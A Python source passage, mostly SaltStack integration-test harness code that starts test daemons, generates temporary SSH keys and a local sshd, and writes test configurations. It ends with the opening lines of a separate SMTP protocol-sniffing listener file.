' * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name='salt-syndic',
daemon_id=self.syndic_opts['id'],
daemon_log_prefix='salt-syndic/{}'.format(self.syndic_opts['id']),
daemon_cli_script_name='syndic',
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts['id'])
try:
sys.stdout.write(
' * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}'.format(**self.colors)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name='salt-proxy',
daemon_id=self.proxy_opts['id'],
daemon_log_prefix='salt-proxy/{}'.format(self.proxy_opts['id']),
daemon_cli_script_name='proxy',
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
sys.stdout.write(
' * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}'.format(**self.colors)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
'''
Create a roster file for salt's syndic
'''
roster_path = os.path.join(FILES, 'conf/_ssh/roster')
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
'''
Generate keys and start an ssh daemon on an alternate port
'''
sys.stdout.write(
' * {LIGHT_GREEN}Starting {0} ... {ENDC}'.format(
'SSH server',
**self.colors
)
)
keygen = salt.utils.path.which('ssh-keygen')
sshd = salt.utils.path.which('sshd')
if not (keygen and sshd):
print('WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!')
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test')
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'key_test',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_err)))
sshd_config_path = os.path.join(FILES, 'conf/_ssh/sshd_config')
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'key_test.pub')
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'server')
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key')
server_dsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_dsa_key.pub')
server_ecdsa_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key')
server_ecdsa_pub_key_file = os.path.join(server_key_dir, 'ssh_host_ecdsa_key.pub')
server_ed25519_priv_key_file = os.path.join(server_key_dir, 'ssh_host_ed25519_key')
server_ed25519_pub_key_file = os.path.join(server_key_dir, 'ssh_host.ed25519_key.pub')
for server_key_file in (server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[keygen, '-t',
'dsa',
'-b',
'1024',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_dsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_dsa_err)))
keygen_process_ecdsa = subprocess.Popen(
[keygen, '-t',
'ecdsa',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ecdsa_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_escda_err)))
keygen_process_ed25519 = subprocess.Popen(
[keygen, '-t',
'ed25519',
'-b',
'521',
'-C',
'"$(whoami)@$(hostname)-$(date -I)"',
'-f',
'ssh_host_ed25519_key',
'-P',
''],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print('ssh-keygen had errors: {0}'.format(salt.utils.stringutils.to_str(keygen_ed25519_err)))
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd_config'), 'a') as ssh_config:
ssh_config.write('AuthorizedKeysFile {0}\n'.format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write('HostKey {0}\n'.format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write('HostKey {0}\n'.format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write('HostKey {0}\n'.format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'sshd.pid')
self.sshd_process = subprocess.Popen(
[sshd, '-f', 'sshd_config', '-o', 'PidFile={0}'.format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print('sshd had errors on startup: {0}'.format(salt.utils.stringutils.to_str(sshd_err)))
else:
os.environ['SSH_DAEMON_RUNNING'] = 'True'
self.prep_syndic()
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'roster'), 'a') as roster:
roster.write(' user: {0}\n'.format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(' priv: {0}/{1}'.format(RUNTIME_VARS.TMP_CONF_DIR, 'key_test'))
sys.stdout.write(
' {LIGHT_GREEN}STARTED!\n{ENDC}'.format(
**self.colors
)
)
@classmethod
def config(cls, role):
'''
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
'''
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
'''
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
'''
if 'runtime_client' not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client'] = salt.client.get_local_client(
mopts=self.master_opts
)
return RUNTIME_VARS.RUNTIME_CONFIGS['runtime_client']
@classmethod
def transplant_configs(cls, transport='zeromq'):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(' * Transplanting configuration files to \'{0}\''.format(RUNTIME_VARS.TMP_CONF_DIR))
tests_known_hosts_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'salt_ssh_known_hosts')
with salt.utils.files.fopen(tests_known_hosts_file, 'w') as known_hosts:
known_hosts.write('')
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'master'))
master_opts['known_hosts_file'] = tests_known_hosts_file
master_opts['cachedir'] = 'cache'
master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
master_opts['pki_dir'] = 'pki'
master_opts['syndic_master'] = 'localhost'
file_tree = {
'root_dir': os.path.join(FILES, 'pillar', 'base', 'file_tree'),
'follow_dir_links': False,
'keep_newline': True,
}
master_opts['ext_pillar'].append({'file_tree': file_tree})
# Config settings to test `event_return`
if 'returner_dirs' not in master_opts:
master_opts['returner_dirs'] = []
master_opts['returner_dirs'].append(os.path.join(RUNTIME_VARS.FILES, 'returners'))
master_opts['event_return'] = 'runtests_noop'
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.is_windows():
virtualenv_binary = os.path.join(real_prefix, 'Scripts', 'virtualenv.exe')
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get('PATH')
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ['PATH'] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.which('virtualenv')
if path is not None:
# Restore previous environ PATH
os.environ['PATH'] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'minion'))
minion_opts['cachedir'] = 'cache'
minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
minion_opts['pki_dir'] = 'pki'
minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
minion_opts['venv_bin'] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'sub_minion'))
sub_minion_opts['cachedir'] = 'cache'
sub_minion_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts['root_dir'] = os.path.join(TMP, 'rootdir-sub-minion')
sub_minion_opts['pki_dir'] = 'pki'
sub_minion_opts['hosts.file'] = os.path.join(TMP_ROOT_DIR, 'hosts')
sub_minion_opts['aliases.file'] = os.path.join(TMP_ROOT_DIR, 'aliases')
if virtualenv_binary:
sub_minion_opts['venv_bin'] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic_master'))
syndic_master_opts['cachedir'] = 'cache'
syndic_master_opts['user'] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts['root_dir'] = os.path.join(TMP, 'rootdir-syndic-master')
syndic_master_opts['pki_dir'] = 'pki'
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['cachedir'] = 'cache'
syndic_opts['root_dir'] = os.path.join(TMP_ROOT_DIR)
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, 'proxy'))
proxy_opts['cachedir'] = 'cache'
# proxy_opts['user'] = running_tests_user
proxy_opts['root_dir'] = os.path.join(TMP, 'rootdir-proxy')
proxy_opts['pki_dir'] = 'pki'
proxy_opts['hosts.file'] = os.path.join(TMP, 'rootdir-proxy', 'hosts')
proxy_opts['aliases.file'] = os.path.join(TMP, 'rootdir-proxy', 'aliases')
if transport == 'tcp':
master_opts['transport'] = 'tcp'
minion_opts['transport'] = 'tcp'
sub_minion_opts['transport'] = 'tcp'
syndic_master_opts['transport'] = 'tcp'
proxy_opts['transport'] = 'tcp'
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, 'syndic')))
syndic_opts['cachedir'] = os.path.join(TMP, 'rootdir', 'cache')
syndic_opts['config_dir'] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# Set up config options that require internal data
master_opts['pillar_roots'] = syndic_master_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
minion_opts['pillar_roots'] = {
'base': [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, 'pillar', 'base'),
]
}
master_opts['file_roots'] = syndic_master_opts['file_roots'] = {
'base': [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, 'file', 'base'),
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
minion_opts['file_roots'] = {
'base': [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, 'file', 'base'),
],
# Alternate root to test __env__ choices
'prod': [
os.path.join(FILES, 'file', 'prod'),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE
]
}
master_opts.setdefault('reactor', []).append(
{
'salt/minion/*/start': [
os.path.join(FILES, 'reactor-sync-minion.sls')
],
}
)
for opts_dict in (master_opts, syndic_master_opts):
if 'ext_pillar' not in opts_dict:
opts_dict['ext_pillar'] = []
if salt.utils.platform.is_windows():
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'type {0}'.format(os.path.join(FILES, 'ext.yaml'))})
else:
opts_dict['ext_pillar'].append(
{'cmd_yaml': 'cat {0}'.format(os.path.join(FILES, 'ext.yaml'))})
# all read, only owner write
autosign_file_permissions = stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(opts_dict['root_dir'], 'extension_modules')
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'extension_modules'
),
new_extension_modules_path
)
opts_dict['extension_modules'] = os.path.join(opts_dict['root_dir'], 'extension_modules')
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(opts_dict['root_dir'], 'autosign_file')
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'autosign_file'),
new_autosign_file_path
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ('hosts', 'aliases'):
optname = '{0}.file'.format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
sub_minion_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_opts['runtests_conn_check_port'] = get_unused_localhost_port()
syndic_master_opts['runtests_conn_check_port'] = get_unused_localhost_port()
proxy_opts['runtests_conn_check_port'] = get_unused_localhost_port()
for conf in (master_opts, minion_opts, sub_minion_opts, syndic_opts, syndic_master_opts, proxy_opts):
if 'engines' not in conf:
conf['engines'] = []
conf['engines'].append({'salt_runtests': {}})
if 'engines_dirs' not in conf:
conf['engines_dirs'] = []
conf['engines_dirs'].insert(0, ENGINES_DIR)
if 'log_handlers_dirs' not in conf:
conf['log_handlers_dirs'] = []
conf['log_handlers_dirs'].insert(0, LOG_HANDLERS_DIR)
conf['runtests_log_port'] = SALT_LOG_PORT
conf['runtests_log_level'] = os.environ.get('TESTS_MIN_LOG_LEVEL_NAME') or 'debug'
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path,
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in ('master', 'minion', 'sub_minion', 'syndic', 'syndic_master', 'proxy'):
computed_config = copy.deepcopy(locals()['{0}_opts'.format(entry)])
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), 'w') as fp_:
salt.utils.yaml.safe_dump(computed_config, fp_, default_flow_style=False)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(sub_minion_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'master'))
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_master_computed_config, wfh, default_flow_style=False)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'), 'w') as wfh:
salt.utils.yaml.safe_dump(syndic_computed_config, wfh, default_flow_style=False)
shutil.copyfile(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'), os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'))
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'master'))
minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'minion'))
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'master'),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, 'minion'),
)
sub_minion_opts = salt.config.minion_config(os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, 'minion'))
syndic_master_opts = salt.config.master_config(os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, 'master'))
proxy_opts = salt.config.proxy_config(os.path.join(RUNTIME_VARS.TMP_CONF_DIR, 'proxy'))
RUNTIME_VARS.RUNTIME_CONFIGS['master'] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['minion'] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic'] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['sub_minion'] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['syndic_master'] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS['proxy'] = freeze(proxy_opts)
verify_env([os.path.join(master_opts['pki_dir'], 'minions'),
os.path.join(master_opts['pki_dir'], 'minions_pre'),
os.path.join(master_opts['pki_dir'], 'minions_rejected'),
os.path.join(master_opts['pki_dir'], 'minions_denied'),
os.path.join(master_opts['cachedir'], 'jobs'),
os.path.join(master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(syndic_master_opts['pki_dir'], 'minions'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_pre'),
os.path.join(syndic_master_opts['pki_dir'], 'minions_rejected'),
os.path.join(syndic_master_opts['cachedir'], 'jobs'),
os.path.join(syndic_master_opts['root_dir'], 'cache', 'tokens'),
os.path.join(master_opts['pki_dir'], 'accepted'),
os.path.join(master_opts['pki_dir'], 'rejected'),
os.path.join(master_opts['pki_dir'], 'pending'),
os.path.join(syndic_master_opts['pki_dir'], 'accepted'),
os.path.join(syndic_master_opts['pki_dir'], 'rejected'),
os.path.join(syndic_master_opts['pki_dir'], 'pending'),
os.path.join(minion_opts['pki_dir'], 'accepted'),
os.path.join(minion_opts['pki_dir'], 'rejected'),
os.path.join(minion_opts['pki_dir'], 'pending'),
os.path.join(sub_minion_opts['pki_dir'], 'accepted'),
os.path.join(sub_minion_opts['pki_dir'], 'rejected'),
os.path.join(sub_minion_opts['pki_dir'], 'pending'),
os.path.dirname(master_opts['log_file']),
minion_opts['extension_modules'],
sub_minion_opts['extension_modules'],
sub_minion_opts['pki_dir'],
master_opts['sock_dir'],
syndic_master_opts['sock_dir'],
sub_minion_opts['sock_dir'],
minion_opts['sock_dir'],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts['root_dir'],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
'''
Kill the minion and master processes
'''
try:
if hasattr(self.sub_minion_process, 'terminate'):
self.sub_minion_process.terminate()
else:
log.error('self.sub_minion_process can\'t be terminate.')
except AttributeError:
pass
try:
if hasattr(self.minion_process, 'terminate'):
self.minion_process.terminate()
else:
log.error('self.minion_process can\'t be terminate.')
except AttributeError:
pass
if hasattr(self, 'proxy_process'):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, 'terminate'):
self.master_process.terminate()
else:
log.error('self.master_process can\'t be terminate.')
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
'''
Subclass this method for additional minion setups.
'''
def setup_minions(self):
'''
Minions setup routines
'''
def post_setup_minions(self):
'''
Subclass this method to execute code after the minions have been setup
'''
def _enter_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ['PATH'] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, 'sshd_process'):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get('PATH', '')
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ['PATH'] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
'''
Clean out the tmp files
'''
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (TMP, RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE, RUNTIME_VARS.TMP_PRODENV_STATE_TREE):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception:
log.exception('Failed to remove directory: %s', dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
'\r{0}\r'.format(
' ' * getattr(self.parser.options, 'output_columns', PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
' * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}'.format(
'{0}'.format(expire - now).rsplit('.', 1)[0],
', '.join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
'\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information '
'back\n'.format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(
list(targets), 'saltutil.running', tgt_type='list'
)
return [
k for (k, v) in six.iteritems(running) if v and v[0]['jid'] == jid
]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
' {LIGHT_BLUE}*{ENDC} Syncing minion\'s {1} '
'(saltutil.sync_{1})'.format(
', '.join(targets),
modules_kind,
**self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets), 'saltutil.sync_{0}'.format(modules_kind),
tgt_type='list',
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info['jid'], timeout) is False:
print(
' {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. '
'Tests requiring these {0} WILL fail'.format(
modules_kind, **self.colors)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info['jid'], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output['ret']:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output['ret'], six.string_types):
# An errors has occurred
print(
' {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: '
'{1}'.format(
name, output['ret'],
modules_kind,
**self.colors)
)
return False
print(
' {LIGHT_GREEN}*{ENDC} Synced {0} {2}: '
'{1}'.format(
name,
', '.join(output['ret']),
modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
' {LIGHT_RED}*{ENDC} {0} already synced??? '
'{1}'.format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionStates')
self.sync_minion_modules_('states', targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionModules')
self.sync_minion_modules_('modules', targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle('SyncMinionGrains')
self.sync_minion_modules_('grains', targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
'''
Ensure all minions and masters (including sub-masters) are connected.
'''
while True:
try:
ret = self.client.run_job('*', 'test.ping')
except salt.exceptions.SaltClientError:
ret = None
if ret and 'minions' not in ret:
continue
if ret and sorted(ret['minions']) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
|
SMTPListener.py
|
import logging
import sys
import os
import threading
import socketserver
import ssl
import socket
from . import *
class SMTPListener(object):
def taste(self, data, dport):
# Once the TCP connection has been established, the server initiates
# the conversation with '220' message. However, if the client connects
# to a nonstandard port there is no way for the proxy to know that
# SMTP is the protocol until the client sends a message.
commands = ['HELO', 'EHLO', 'MAIL FROM', 'RCPT TO', 'TURN', 'ATRN',
